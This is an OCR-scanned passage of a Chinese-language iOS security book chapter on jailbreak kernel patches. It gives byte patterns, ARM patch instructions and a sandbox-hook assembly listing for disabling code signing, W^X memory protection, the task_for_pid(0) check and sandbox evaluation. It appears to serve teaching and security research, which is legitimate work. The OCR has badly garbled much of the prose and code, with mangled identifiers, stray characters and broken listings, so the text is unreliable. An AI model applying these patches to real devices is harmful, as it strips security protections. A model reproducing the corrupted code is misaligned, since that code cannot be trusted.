用 。 考 虑 到 该 变量 被 初始 化 为 0 而 且 不 会 被 写 人 ， 所 以 它 没有 被 编译 器 优化 掉 真 是 万 幸 。 因 此 ， 
在 它 已 经 位 于 内 核 二 进 制 文件 中 之 后 ， 越 狱 工具 就 可 以 给 它 打 补 丁 了 。 对 于 iOS 5 来 说 ，comex 
决定 不 再 为 该 变量 打 补 丁 ， 而 是 为 检查 该 变量 的 代码 打 补 丁 。 如 果 该 变量 在 未 来 的 OS 中 不 再 使 
用 ， 直 接 为 代码 打 补 丁 也 不 失 为 一 条 可 行 之 道 。 

qatautils0 中 的 内 核 补丁 生成 咒 是 通过 查找 如 下 字 节 模式 找到 这 一 检查 的 : 


df f8 88 33 1d ee 90 0f a2 6a 1b 68 00 2b 






























































反 汇 编 的 形式 就 是 : 

80045730 LDR.W R3, =dword_802DE330 
80045734 MRC p15, 0, RO,c13,c0, 4 
80045738 LDR R2, [R4,#0x28] 
8004573A LDR R3, [R3] 

8004573C CMP R3, #0 


大 家 在 这 里 可 以 看 到 ，cs_enforcement_dqisable 变 量 位 于 地 址 0x802DE330 处 ， 它 的 值 
被 装 入 R3 寄 存 器 中 ， 然 后 与 0 进行 比较 。 为 这 一 过 程 打 补丁 最 简单 的 方式 就 是 把 值 1 装 入 R3 寄 存 
需 ， 而 非 从 0x802DE330 处 取 回 它 的 值 。 这 样 做 就 足够 为 vnm_fault_entez () 中 对 该 变量 的 两 次 
使 用 打上 补丁 了 ,因为 编译 器 生成 的 代码 不 会 重新 装载 该 变量 , 而 是 直接 使 用 寄存 器 缓存 的 该 变 
量 副 本 。 

3.cs _ enforcement disable (AMFI|) 

我 们 在 第 4 章 中 讨论 过 的 AMFI ( Apple Mobile File Integrity， 苹 果 移 动 设备 文件 完整 性 ) 内 核 
模块 会 检查 若干 参数 是 否 存在 , 其 中 之 一 就 是 cs_enforcement_disable。 如 果 设 置 了 该 参数 ， 
那么 这 个 变量 就 会 对 AMFI_vnode_check_exec () 策 略 处 理 程序 的 工作 方式 产生 影响 。 正 如 大 家 
从 下 面 这 段 策略 检查 的 反 编译 代码 中 所 见 ， 它 会 阻止 AMFI 在 进程 的 代码 签名 标志 中 设置 


CS_HARD 和 CS_KILL 标 志 : 















































int AMFI_vnode check_ exec(kauth cred t cred, struct vnode *vp, struct label *label, 
struct label *execlabel, struct componentname *cnp, u_int *csflags) 
{ 
if ( !cs_enforcement_ qisable ) 
{ 
if ( !csflags ) 
Assert( 
"/SourceCache/AppleMobilerFileIntegrity/AppleMobileFileIntegrity- 
79/AppleMobileFileIntegrity.cpp", 
872, 
"csflags"); 
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xcsflags |= CS_HARD|CS_KILL; 
} 
return 0; 


} 

如 果 未 设置 Cs_HARD 和 cs_KILL 标 志 ,， 就 有 效 地 禁用 了 代码 签名 。 不 过 ,目前 还 不 清楚 为 什 
么 当前 的 越狱 工具 给 该 变量 打 补 丁 ， 因 为 execve () 和 posix_spawn() 系统 调用 中 用 到 的 
mac_vnode_check_exec() 策略 检查 已 经 被 proc_enforce 补 本 禁用 了 ， 正 如 大 家 在 下 面 这 段 
代码 中 看 到 的 : 


int mac_ vnode check exec(vfs_ context _t ctx, struct vnode *vp, 
struct image params *imgp) 





{ 
kauth _ cred t cred; 
int error; 


if (!mac_vnode _ enforce || !mac_proc_enforce) 
return (0); 


cred = vfs_context_ucred (ctx); 
MAC_CHECK (vnode_ check exec, cred, vp, vp->v_label, 

















(imgp != NULL) ? imgp->ip_execlabelp : NULL, 
(imgp != NULL) ? &imgp->ip_ndp->ni_cnd : NULL, 
(imgp != NULL) ? &imgp->ip_csflags : NULL); 





return (error); 


} 

如 果 像 大 多 数 已 经 公开 的 越狱 工具 所 做 的 那样 把 proc_enforce 标 志 置 为 0， 代 码 就 根本 不 
会 执行 AMFI 策 略 检查 。 相 反 ， 该 检查 会 返回 成 功 。 因 此 ， 只 有 在 未 触及 proc_enforce 标 志 时 ， 
这 个 补丁 才 会 发 挥 作用 ， 我 们 所 了 解 的 一 些 非 公开 越狱 工具 就 是 这 种 情况 。 

4.PE i can has debugger 

iOS 内 核 中 有 一 个 名 为 PE_i_can_has_debugger () 的 函数 。 内 核 以 及 许多 内 核 扩 展 都 多 次 
利用 了 该 函数 ， 以 确定 是 否 允 许 调试 。 例 如 ， 如 果 该 函数 不 返回 true， 我 们 就 不 能 使 用 KDP 内 
核 调 试 器 。 因 为 XNU 源 代码 中 并 没有 提供 该 函数 ， 所 以 请 大 家 参考 如 下 反 编 译文 件 : 

int PE_i_can has_debugger (int *pFlag) 


{ 
int vl; // rl@3 






































if ( pFlag ) 
€ 
If ( debug_enable ) 
V1 = debug_boot_arg; 


return debug_enable; 
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iOS 4.3 以 前 的 越狱 工具 会 给 该 函数 打 补 丁 ， 使 它 总 能 返回 true。 如 果 不 用 到 KDP 内 核 调 试 
右 ， 这 似乎 是 靠 谱 的 。 设 置 debug3 引 导 参 数 会 在 某 些 iOS 内 核 扩 展 中 引发 内 核 严重 错误 ， 因 为 只 
返回 true 并 不 能 完全 模仿 原始 孔 数 。 这 就 是 当下 的 越狱 工具 不 再 为 该 也 数 的 代码 打 补 丁 ， 转 而 
为 内 存 中 的 aebug_enable 变 量 打 补丁 的 原因 。 要 确定 该 变量 的 地 址 ， 我 们 就 需要 分 析 
PE_i_can_ has_debugger() 函数 的 代码 。 因 为 该 变量 是 在 未 初始 化 的 内 核 数据 段 中 , 所 以 该 补 
丁 只 能 在 运行 时 执行 。 想 找 出 在 引导 期 间 初 始 化 该 变量 的 代码 ， 我 们 应 该 查找 字符 串 
debug-enabled。 这 样 ， 你 就 会 让 直接 找到 将 该 值 复制 到 该 变量 中 的 代码 。 

5. vm map_ enter 

在 把 内 存 映 射 到 进程 的 地 址 空间 中 时 , 我 们 要 调用 内 核 函 数 vm_map_enter () , 在 虚拟 地 址 
映射 中 分 配 一 个 范围 。 大 家 可 以 利用 mmap () 系统 调用 触发 该 函数 。 在 说 到 越狱 时 ， 该 函数 很 有 
意思 , 因为 它 实施 了 映射 的 内 存 不 能 同时 可 写 且 可 执行 的 规则 , 而 下 面 的 代码 就 是 实施 该 规则 的 。 
大 家 可 以 参考 /osftmk/vm/vm_map.c 文 件 ， 以 查看 该 函数 的 完整 源 代码 。 正 如 代码 所 示 ， 假如 设置 
了 VM_PROT_WRITE 标 志 ， 我 们 就 要 把 vm_PROT_EXECUTE 标 志清 除 : 



























































kern_ return t vm map_enter!( 








vm map_t map, 

vm map_offset 七 *address, /* IN/OUT */ 
vm_ map_size 七 size, 

vm map_offset_t mask, 

int flags, 
vm_object 七 object, 
vm_object_offset_t offset, 

boolean 七 needs_copy, 
vm_prot_t cur_protection, 
vm_prot_t max_protection, 
vm_ inherit 七 inheritance) 


if (cur_protection & VM PROT WRITE)T{ 
if ((cur_ protection & VM PROT EXECUTE) && ! (flags & VM FLAGS MAP_ JIT) ) 1{ 
printf ("EMBEDDED: %s curprot cannot be writetexecute.turning off 
execute\n", _ _ PRETTY FUNCTION  ); 
Cur_protection &= ~VM PROT_ EXECUTE; 












































} 
} 


正如 大 家 在 第 4 章 中 看 到 的 ， 这 条 规则 存在 一 个 叫 作 JIT (实时 ) 映射 的 例外 情况 。 这 是 一 类 
特殊 的 内 存 区 域 ， 它 可 以 同时 可 写 和 可 执行 ， 因 为 MobileSafari 中 的 即时 JavaScript 编 译 器 要 求 它 
这 样 。 只 有 在 应 用 具有 动态 代码 签名 特权 时 ， 我 们 才 有 可 能 利用 一 次 该 例外 情况 。 

迄今 为 止 ， 只 有 MobileSafari 才 得 此 “神功 ”。 其 他 应 用 都 不 含 自修 改 代 码 ( self-modifying 
code )、 动 态 代码 生成 器 或 即时 编译 器 ， 第 4 章 讨 论 过 的 由 Charlie Miller 发 现 的 动态 代码 签名 漏洞 
除外 。 对 于 完整 的 越狱 工具 而 言 , 这 是 个 让 人 讨厌 的 限制 , 因为 它 不 允许 在 运行 时 为 应 用 打 补 丁 ， 
而 常用 到 的 MobileSubstrate 公 共 库 又 需要 这 样 。 此 外 ， 越 狱 过 的 iPhone 上 可 以 使 用 的 很 多 模拟 器 
也 要 用 到 自修 改 代码 。 
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想 要 找到 为 该 检查 打 补 丁 的 最 佳 方式 ， 大 家 应 该 看 看 iOS 内 核 的 二 




















Vvm_map_ente ( 





























800497C6 LDR 
800497C8 AND.W 
800497CC STR 
800497CE STR 
800497D0 AND.W 
800497D4 CMP 
800497D6 ITT EQ 
800497D8 ,DREQ 
800497DA CMPEQ 
800497DC BNE 
800497DE ,DR.W 
800497E2 MOVS 
800497E4 BL 
800497E8 ,DR 
800497EA BIC.W 
800497EE STR 











#0: 


R1, [RY7,#cur_protection] 
RO, R4, 0x80000 

RO SP,#0xB8+var_54] 
R1, [SP,#0xB8+var_78] 
RO RL. 6 
RO, #6 








RO, SP,#0xB8+var_54] 


RO, #0 
loc_800497F0 

R1, =aKern return_ 
RO, #0 


sub_8001D608 

RO, [R7,#cur_protection] 
RO, RO, #4 

RO, [SP,#0xB8+var_78] 








进 制 文件 。 虽然 没有 对 应 








() 函数 的 符号 , 但 是 通过 查找 含有 vm_map_entez 的 字符 串 还 是 很 容易 找到 该 函 
数 的 。 在 看 到 该 检查 的 ARM 汇 编程 序 后 ， 你 就 会 发 现 有 多 个 不 同 的 一 
检查 。 比 方 说 ， 我 们 可 以 把 aND.W R0， 
R0，#4 修 改 成 BIC.W R0，R0， 


节 补 丁 可 以 “干掉 ”该 
R1，#6 修 改 成 AND.W RO0，R1，#8， 或 是 把 BIC.W R0， 


对 于 那些 为 了 进行 安全 研究 或 访问 shell 才 给 iPhone 越狱 的 人 来 说 ， 这 个 补丁 没 必 要 打 。 突 破 





一 限制 实际 上 会 适 得 


6.vm map protect 


当 对 映射 内 存 的 保护 发 生 改 变 时 , 我 们 就 要 调用 内 核 隐 数 vm_map_protect ( 
用 mprotect () 系统 调用 触发 对 该 函 与 vm_map_enter ( 





把 内 存 保护 改 为 同时 可 写 且 可 执行 。 下 





其 反 ， 因 为 这 样 一 来 越狱 过 的 iPhone 的 行为 就 不 那么 像 默 认 的 iPhone 了 。 


。 大 家 可 以 利 


) 函数 类 似 ， i 
全 出 的 这 段 代 码 实 施 了 该 规则 。 如 果 想 更 为 详细 地 了 解 


Ol at de es 整 代码 。 正 如 代码 所 示 ， 如 果 设 置 

















了 VM_PROT_WRITE 标 志 ， 还 是 


要 清除 VM_PROT_EXECUTE 标 志 : 


kern return t vm map_protect!( 





register vm map_t 


map, 


register vm map_offset 七 start, 
register vm map_ offset 七 end, 


register vm prot 七 
register boolean t 


{ 














#if CONFIG _ EMBEDDED 


new_prot, 
set_max) 


if (new_ prot & VM PROT WRITE) { 
IE ((new prot & VM PROT EXECUTE) && ! (current->used for jit)) { 


DE 
_FUNCTION_ 


same time\n", 





























) 3 


new_prot &= ~VM_ PROT_ EXECUTE; 


#endif 
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这 里 还 是 可 以 看 到 ,只 有 那些 用 于 即时 编译 的 内 存 范围 例外 , 而 只 有 那些 具有 动态 代码 签名 
特权 的 应 用 才能 创建 这 样 的 内 存 范围 。 其 他 应 用 都 不 能 使 用 mprotect () 让 内 存 区 域 既 可 写 同时 
又 可 执行 。 因此, 标准 的 越狱 工具 会 为 该 检查 打 补 本 ， 从 而 允许 应 用 让 之 前 分 配 的 内 存 变 得 既 可 
写 又 可 执行 。 

要 给 该 函数 打 补 本 ,首先 需要 找到 它 。 虽 然 没 有 指向 它 的 内 核 符号 , 但 该 函数 中 存在 对 字符 
串 vm_map_protect 的 引用 ,这 就 让 寻找 该 函数 的 工作 变 得 简单 了 。 再 来 看 看 它 的 ARM 反 汇编 
文件 ， 有 两 种 一 字 节 补丁 可 用 于 移 除 这 里 的 安全 检查 。 我 们 可 以 把 AND.W R1，R6，#6 修 改 成 
AND.W R1，R6，#8， 或 者 把 BIC.W R6，R6，#4 修 改 成 BIC.wW R6，,，R6，#0: 






































8004A950 AND.W R1, R6, #6 
8004A954 CMP R1, #6 

8004A956 IT EQ 

8004A958 TSTEQ.W RO, #0x40000000 
8004A95C BNE loc_8004A96A 
8004A95E BIC.W R6, R6, #4 











因为 这 一 补丁 ， 越 狱 削弱 了 ioOS 设 备 的 内 存 保护 。 我 们 建议 ， 只 有 当 自 己 想 要 运行 那些 需要 
自修 改 代 码 的 应 用 时 , 才 在 越狱 时 应 用 该 补丁 。 这 些 补 丁 的 问题 在 于 消除 了 对 非 可 执行 内 存 的 限 
制 ， 这 样 一 来 针对 iPhone 的 远程 攻击 就 不 一 定 需要 完全 靠 ROP 实 现 ， 而 是 只 需要 一 小 段 使 用 了 
mprotect () 的 ROP 存 根 ， 就 能 让 注入 的 代码 变 得 可 以 执行 。 

7. AMFI 受 信任 二 进 制 文件 缓存 

AMFI 内 核 模块 负责 验证 代码 签名 BLOB 上 的 数字 签名 。 它 注册 了 若干 个 MAC 策 略 处 理 程序 ， 
比如 vnode_check_signature 钩 子 程 序 ， 每 当 有 新 的 代码 签名 BLOB 被 添加 到 内 核 时 ， 都 要 调 
用 该 钧 子 程序 。AMFI 处 理 程序 会 针对 来 自 苹 果 公 司 的 证 书 验证 签名 。 不 过 ， 如 果 设 置 了 
amfi_det_out_of_my wav 或 amfi_allow_any_signature 引 导 人 参数 ， 你 就 可 以 绕 过 这 一 验 
证 , 而 这 只 有 在 基于 bootrom 或 iBoot 的 越狱 工具 中 才能 实现 。 但 是 , 如 果 能 在 名 为 AMFI 受 信任 二 
进 制 文件 的 内 置 列 表 ( 含有 逾 2200 条 已 知 的 散 列 ) 中 找到 代码 签名 BLOB 的 SHA1 散 列 , 也 是 可 以 
跳 过 这 种 验证 的 。 查 找 受信 任 缓存 的 工作 是 在 某 个 函数 中 实现 的 ，comex 为 它 打 上 了 补丁 ， 证 它 
总 是 返回 成 功 。 这 让 AMFI 相 信 每 个 签名 都 在 该 缓存 中 ， 从 而 认定 这 些 签名 都 是 受信 任 的 ， 这 样 
就 能 有 效 地 禁用 代码 签名 BLOB 上 的 数字 签名 。 

通过 在 AMFI MAC 策 略 表 中 查找 AMFI vnode_check_signature MAC 策 略 处 理 程序 ， 并 
在 该 程序 中 查找 第 一 次 函数 调用 , 我 们 就 可 以 找到 该 函数 的 地 址 。 另 一 种 寻找 该 郴 数 的 方式 是 在 
内 核 二 进 制 文件 中 查找 如 下 字 节 模式 : 

f0 b5 03 af 2d e9 00 05 04 46 .. .. 14 f8 01 0b 4f f0 13 0c 

然后 就 要 用 只 返回 true 的 函数 覆盖 这 段 代 码 ， 这 会 在 绕 过 数字 签名 时 派 上 用 场 。 进 一 步 研 
究 该 内 核 补 丁 ， 你 就 会 发 现 这 是 完全 不 必要 的 。 当 我 们 查看 在 /security/mac_vfs.c 中 定义 的 
mac_vnode_check_signature 代 码 时 ， 会 发 现 之 前 的 proc_enforce 补 丁 已 经 将 这 个 AMFI 处 
理 程序 彻底 禁用 了 : 


int mac_ vnode check signature(struct vnode *vp, unsigned char *shal, void *signature, 
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Size t size) 
{ 


int error; 


if (!mac_vnode enforce || 
return (0); 


MAC_CH 
return 





(error); 


. 





如 果 禁 用 了 mac_proc_enforce 标 志 ， 


8.task for pia 0 


ECK(vnode check_ signature, 


AMFI 的 vnode_check_signature 检 查 就 
用 。 对 于 利用 了 AMFI 受 信任 二 进 制 文件 缓存 的 其 他 MAC 策 略 处 理 程序 而 言 , 这 


!mac_proc_enforce) 


vp, vp->v_label, shal, signature, size); 


不 会 被 调 
点 也 是 成 立 的 ed 














虽然 该 补丁 对 于 大 多 数 给 设备 越狱 的 人 来 说 不 必要 ,但 还 是 要 讲 讲 它 , 因 为 它 涉及 mach 隐 阱 ， 
我 们 可 以 顺便 介绍 一 种 在 iOS 内 核 二 进 制 文件 中 寻找 mach 隐 阱 表 (mach_trap_table ) 的 策略 。 





task_for_pid() 国 数 是 个 


这 仅 限 于 那些 用 户 ID 相同 的 进程 ， 


mach 陷 阱 , 它 会 返回 另 一 进程 以 其 进程 ID 命名 的 任务 端口 。 不 过 
除非 请 求 任务 端口 的 进程 是 特权 进程 。 在 早期 的 Mac OS X 版 











本 中 , 我 们 可 以 通过 请 求 0 号 进程 的 任务 端口 得 到 内 核 进 程 的 任务 端口 。MAC OS 义 的 rootkit 程 序 





就 利用 了 该 技术 ， 因 为 它 让 用 户 空 


s 间 的 进程 可 以 读 写 任意 内 核 内 存 。 





这 可 能 是 task_for_pid() 被 修改 成 不 








再 能 访问 0 号 进程 的 任务 端口 的 原因 ， 正 如 大 家 在 下 














面 这 段 从 XNU 源 代码 的 /bsd/vm/vm_unix.c 文 件 中 摘录 的 代码 中 可 以 看 到 的 : 


kern return 七 task for pid(struct task for pid args *args) 





{ 


mach_ port_ name_t 


target_tport 


= args->target_ tport; 





int pid = args->pid; 

user_addr_t task_addr = args->t; 

DECOC 七 p = PROC_NULL; 

task_t tl1 = TASK_NULL; 

mach port_ name_t tret = MACH_ PORT_NULL; 
EN rel lof os tfpport; 


void * sright; 
int error 0; 


AUDIT_MACH_SYSCALLD . 





ENTI 





ER (AU. 





E_TASKFORPID); 





AUDIT_ARG (pid, pid); 
AUDIT_ARG (mach port!1, 


target_tport); 

















/* 总 是 要 检查 是 否 有 piqd == 0 */ 

1 (Bid sa OY 
(void ) copyout((char *)&tl1, task addr, sizeof (mach port name t)); 
AUDIT_ MACH_ SYSCALL EXIT (KERN_FAILURE); 
return (KERN_FAILURE); 











} 





正如 大 家 所 见 ， 现 在 存在 对 进程 ID 是 否 为 0 的 显 式 检查 了 ， 如 果 进 程 ID 是 0， 就 会 返回 错误 


代码 。comex 为 该 检查 打 了 补丁 ， 


图 灵 社 区 会 员 























把 if 语 句 生 成 的 条 件 跳 转变 成 了 无 条 件 跳 转 。 可 以 通过 查找 如 
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下 字 节 串 模式 找到 要 打 补 丁 的 地 址 : 

91 e8 01 04 dl f8088000210291bafl000f0191 

另 一 种 寻找 打 补 丁 位 置 的 方式 是 在 mach 陷 阱 表 中 查找 task_for_pid() 函数 的 地 址 。 不 过 ， 
在 /osfmk/kern/syscall_ sw.c 文 件 中 定义 的 mach_trap_table 符 号 并 未 导出 ， 因 此 我 们 需要 多 付出 
些 努 力 才 能 找到 该 表 。 该 表 的 定义 如 下 所 示 : 


mach_ trap_t mach trap_table{[MACH_ TRAP_TABLE_COUNT 























= +{ 





] 
LQ MACH_TRAP (kern_invalid, 0, NULL, NULL), 
/* 1 */ MACH_TRAP (kern_invalid, 0, NULL, NULL), 
VA 全 MACH_TRAP (kern_invalid, 0, NULL, NULL), 
/26 wy MACH_TRAP (mach_ reply_ port, 0, NULL, NULL), 


RA. 
/* 27 */ MACH_TRAP (thread_ self trap, 0, NULL, NULL), 
/* 28 */ MACH_TRAP (task_ self trap, 0, NULL, NULL), 

















J/* 45 SS/ MACH_TRAP (task_for pid, 3, munge www, munge_ddd), 

在 这 里 可 以 看 到 , 该 表 开头 列 出 的 是 一 些 无 效 内 核 陷阱 。 大 家 可 以 利用 这 一 情况 检测 该 表 在 
内 存 中 的 地 址 。 在 公开 的 XNU 源 代码 中 ， 该 表 定 义 的 前 26 个 mach 陷 阱 都 是 无 效 的 。 但 是 ， 如 果 
大 家 看 到 iOS 内 核 的 源 代 码 ， 就 会 发 现 只 有 前 10 个 mach 陷 阱 是 无 效 的 。 

不 巧 的 是 ，kern_invaliqd() 抑 数 也 是 未 导出 的 ， 因此 必须 先 找到 它 。 但 这 不 是 问题 ， 因 为 
下 面 的 代码 表明 ， 它 引用 了 一 个 很 有 揭示 作用 的 字符 串 : 


ketzn_return t kern invalid(_ unused struct kern invalid args *args) 


{ 





























if (kern invalid debug) Debugger ("kern invalid mach trap"); 
return (KERN_INVALID ARGUMENT); 








} 

因为 所 引用 的 字符 串 只 在 这 段 代 码 中 用 到 一 次 , 所 以 对 该 字符 串 的 唯一 一 次 交叉 引用 就 来 自 
kern_invalid() 因数 。 有 了 该 地 址 的 帮助 ,只 要 查找 四 字 节 0 跟 上 四 字 节 上 男 数 地 址 的 重复 模式 ， 
就 能 找到 mach 陷 阱 表 了 。 不 过 ,在 当前 的 iOS 内 核 中 ，kern_invalid() 的 地 址 并 非 真 是 找到 该 
表 的 必要 条 件 ， 因 为 四 字 节 0 的 重复 模式 再 跟 上 相同 指针 就 足以 找到 该 表 了 。 

9. 沙 盒 补丁 

comex 的 内 核 补丁 集中 最 后 一 个 内 核 补丁 会 改变 沙 盒 的 行为 。 如 果 没 有 这 个 补丁 ， 在 越狱 过 的 
iPhone 上 就 没 法 使 用 MobileSafari 和 MobileMail 这 样 的 应 用 。 出 现 这 一 情况 的 原因 在 于 , 越狱 工具 会 把 
/Applications 目 录 移 动 到 /var/stash/Applications 目 录 中 ， 这 样 就 违反 了 沙 盒 机 制 。 奇 怪 的 是 ， 目 前 我 们 
也 只 发 现 这 两 个 应 用 会 受 影响 。 即 使 不 给 沙 盒 打 补丁 ， 其 他 所 有 内 置 应 用 看 起 来 也 都 能 正常 工作 。 

该 补丁 本 身 由 两 部 分 组 成 ， 第 一 部 分 会 用 一 个 钧 子 重 写 sb_evaluate () 困 数 的 开头 部 分 ， 
而 第 二 部 分 则 是 一 段 写 入 内 核 中 未 使 用 区 域 的 新 代码 。 要 了 解 更 多 与 该 函数 有 关 的 信息 , 请 回顾 
第 5 章 。 该 补丁 会 改变 沙 盒 评估 的 行为 ， 从 而 以 不 同方 式 处 理 对 特定 目录 的 访问 。 

在 描述 新 的 评估 功能 之 前 ， 首 先 我 们 要 想 办 法 确定 sb_evaluate () 函数 在 内 核 代 码 中 的 位 
置 。 一 种 可 能 的 方法 是 在 Sandbox 内 核 扩展 中 查找 MAC 策 略 处 理 程序 表 。 有 不 少 MAC 策 略 处 理 程 
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序 都 用 到 了 sb_evaluate () 函数 。 对 于 当前 的 iOS 内 核 而 言 ， 查 找 字符 串 baq opcode 会 更 简单 。 
这 个 字符 串 只 在 大 家 感 兴趣 的 函数 中 使 用 过 ,而且 一 旦 大 家 找到 它 的 数据 引用 , 找 出 用 到 它 的 函 
数 的 开头 就 行 了 。 

在 确定 了 sb_evaluate () 畏 数 的 地 址 后 ， 我 们 就 可 以 在 该 国 数 中 放 入 钩子 ， 让 它 跳 转 到 未 
使 用 的 内 核 区 域 了 ， 而 该 区 域 就 是 用 来 容纳 该 补丁 第 二 部 分 的 代码 的 。 我 们 在 第 9 章 中 已 经 介绍 
过 如 何 寻找 这 样 的 未 使 用 区 域 。 大 家 可 以 在 comex 的 daatautils0 Github 资 料 库 中 找到 该 钩子 
的 源 代码 , 不 过 我 们 在 这 里 要 一 部 分 一 部 分 地 探讨 这 段 代码 。 而 它 的 整体 思路 是 从 沙 盒 检查 中 排 
除 /private/var/mobile 目 录 外 以 及 /private/var/mobile/Library/Preferences 目 录 内 的 文件 。 这 上 段 代 码 首 
先 会 检查 提供 的 vnode 是 否 为 0。 如 果 是 ， 钩 子 就 会 忽略 这 次 调用 ， 直 接 把 执行 权 传递 给 原始 的 
处 理 程 序 。 


start: 
push {r0-r4, lr} 
sub sp, #0x44 
ldr r4, [r3, #0x14] 
cmp r4, #0 
beq actually_eval 


接 下 来 的 这 部 分 代码 会 调用 vn_getpath() 函数 ， 取 回 对 应 所 提供 vnode 的 路 径 。 如 果 该 函 
数 返 回 错误 , 除了 ENOSPC 错 误会 被 忽略 , 所 有 其 他 错误 都 会 导致 执行 权 被 传递 给 原始 处 理 程序 : 


ldr r3, vn_getpath 
mov rl, sp 

movs r0, #0x40 
add r2, sp, #0x40 
str r0;, [rz2] 

mov r0, r4 

blx r3 

cmp r0, #28 

beq enospc 

cmp r0, #0 

bne actually_eval 


如 果 没 有 返回 错误 , 或 是 没有 足够 的 空间 取得 完整 的 路 径 名 , 我 们 就 要 把 返回 的 路 径 名 与 字 
符 串 /private/var/mobile 加 以 比较 。 如 果 路 径 名 不 匹配 ， 就 允许 访问 : 


enospc: 
# that error's okay... 












































mov r0, sp 

adr rl1l, var_ mobile ; # "/private/var/mobile" 
movs r2, #19 ;# len(var_ mobile) 

ldr r3, memcmp 

bilix E3 

cmp r0, #0 

bne allow 


如 果 路 径 名 匹配 , 就 要 与 /private/var/mobile/Library/Preferences/com.apple 加 
以 比较 。 如 果 还 匹配 ， 就 要 调用 原始 的 sb_evaluate () 图 数 : 


mov r0, sp 
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adr rl, pref_com apple 
; # "/private/var/mobile/Library/Preferences/com.apple" 
movs r2, #49 ;# len(preferences_com apple) 
ldr r3, memcmp 
blx r3 
cmp r0, #0 
beq actually_eval 
接 下 来 的 检查 只 是 测试 路 径 名 是 否 在 /private/var/mobile/Library/Preferences 中 。 如 果 是 ,就 允 
许 访 问 ， 否 则 调用 原始 的 处 理 程序 : 
mov r0, sp 
adr rl1l, preferences ;# "/private/var/mobile/Library/Preferences" 
movs r2, #39 ;# len(preferences) 
ldr r3, memcmp 
blx r3 
cmp r0, #0 
bne actually_eval 


用 于 允许 访问 的 代码 会 将 该 信息 写 回 所 提供 的 数据 结构 中 。 想 了 解 更 多 细节 ， 请 参考 第 5 章 
中 的 相应 内 容 。 


allow: 
# it's not in /var/mobile but we have a path, let it through 
adqd sp, #0x44 
pop {r0} 
movs rl1, #0 
St Fl [EO 
movs rl1, #0x18 
strb r1l, [r0O, #4] 
pop {rl-r4, pc} 


其 余 代码 的 作用 就 是 把 执行 权 传 回 原始 函数 。 我们 在 这 里 不 讨论 这 部 分 代码 ,因为 这 不 过 是 
标准 的 API 拦 截 技术 。 

10. 清空 缓存 

应 用 上 述 内 核 补 本 是 很 简单 的 ， 因 为 整个 内 核 镜 像 都 在 可 读 写 且 可 执行 的 内 存 中 。 因 此 ， 内 
核 级 的 有 效 载荷 可 以 直接 在 原始 代码 上 打 补丁 ， 而 不 需要 改变 内 存 权 限 。 唯 一 的 麻烦 就 是 ， 在 为 
内 核 打 补丁 时 必须 清空 CPU 的 指令 缓存 和 数据 缓存 , 否则 越狱 工具 所 做 的 修改 可 能 没 法 立即 激活 。 

iOS 内 核 导 出 了 实现 该 目的 所 需 的 两 个 函数 ， 每 当 漏 洞 攻击 有 效 载荷 需要 直接 为 内 核 代 码 或 
数据 打 补 丁 时 ， 就 应 该 调用 这 两 个 函数 。 为 了 清空 指令 缓存 ， 我 们 需要 调用 invalidate_ 
icache () 函数 。 该 函数 有 3 个 参数 ,第 一 个 参数 是 需要 清空 的 内 存 区 域 的 地 址 ,第 二 个 参数 是 该 
区 域 的 长 度 ， 而 第 三 个 参数 应 该 是 0。 

用 于 清空 数据 缓存 的 函数 是 Elush_dcache() ， 而 且 它 使 用 的 也 是 上 述 3 个 参数 。 





































































































10.4.4 安全 返回 


在 权限 得 到 提升 、 内 核 的 安全 功能 都 已 经 被 取消 之 后 , 剩 下 的 事 就 是 以 一 种 干净 利落 的 方式 
离开 内 核 了 。 这 为 的 是 防止 内 核 变 得 不 稳定 或 是 立即 月 溃 。 要 做 到 这 一 点 ,我 们 通常 只 需要 把 通 
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用 CPU 寄存 器 还 原 成 调用 内 核 有 效 载荷 之 前 的 值 , 然后 返回 已 经 保存 的 程序 计数 器 。 在 内 核 栈 绥 
冲 区 溢出 的 情况 中 , 这 可 能 无 法 实现 ,因为 栈 中 的 实际 值 已 经 被 缓冲 区 溢出 覆盖 了 。 如 果 出 现 这 
种 情况 ， 就 可 能 要 返回 之 前 未 被 破坏 的 某 个 栈 帧 了 。 

男 一 种 退出 内 核 的 方式 是 调用 内 核 函 数 thread_exception_return()。 因 为 在 内 核 中 没 
有 对 应 该 函数 的 符号 , 所 以 大 家 需要 通过 模式 扫描 或 通过 对 其 交叉 引用 的 扫描 找到 该 函数 。 它 在 
内 核 中 的 作用 是 ， 当 没 法 展开 栈 帧 时 ， 就 从 请 求 执行 权 的 异常 状态 中 恢复 过 来 ,终止 当前 的 内 核 
线程 。 因 此 ,我 们 可 以 利用 它 从 漏洞 攻击 有 效 载 荷 离开 内 核 。 不 过 ， 只 要 有 可 能 ， 你 还 是 应 该 通 
过 返回 正确 栈 帧 离开 内 核 ， 因 为 不 这 样 就 没 法 保证 离开 内 核 后 内 核 还 处 于 稳定 状态 。 
































10.5 小结 


我 们 在 本 章 中 深入 了 解 了 大 多 数 人 都 讳 莫 如 深 的 越狱 技术 ,介绍 了 为 什么 要 使 用 越狱 过 的 
iPhone《〈 而 不 是 原矿 版 或 用 于 开发 应 用 的 iPhone ) 进行 安全 研究 ， 而 且 讨论 了 不 同类 型 越狱 工具 
的 优 缺 点 。 

我 们 分 析 了 redsn0ow 越 狱 工具 的 内 部 工作 原理 , 并 一 步 步 地 了 解 了 越狱 过 程 的 每 个 步 又。 这 
应 该 明确 了 越狱 过 的 iPhone 与 原 厂 iPhone 之 间 在 实用 性 和 安全 性 方面 的 区 别 。 

我 们 还 介绍 了 越狱 工具 应 用 的 内 核 补丁 , 并 讨论 了 每 个 补丁 背后 的 作用 机 制 、 如 何 找 到 要 打 
补丁 的 地 址 ,以 及 用 什么 方式 来 打 补 丁 。 在 了 解 这 些 内 容 后 ,大 家 应 该 能 把 这 些 补丁 移植 到 以 后 
的 OS 中 ， 不 再 必须 依靠 越狱 社区 了 。 
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iOS 设 备 中 的 蜂窝 网 络 通信 栈 运行 在 专门 的 芯片 上， 这 个 芯片 就 是 数字 基带 处 理 器 ( digital 
baseband processor )。 如 果 攻 击 者 控制 了 iPhone 的 基带 端 , 就 可 以 执行 各 种 与 设备 的 电话 功能 有 关 
的 攻击 ， 比 如 监控 来 电 和 去 电 、 打 电话 、 发 送 和 拦截 短信 、 拦 截 卫 流量 ， 以 及 通过 激活 自动 应 答 
来 电 功 能 把 iPhone 变 成 一 个 远程 激活 的 麦克 风 。 本 章 探讨 如 何在 基带 软件 栈 中 触发 内 存 破坏 ， 并 
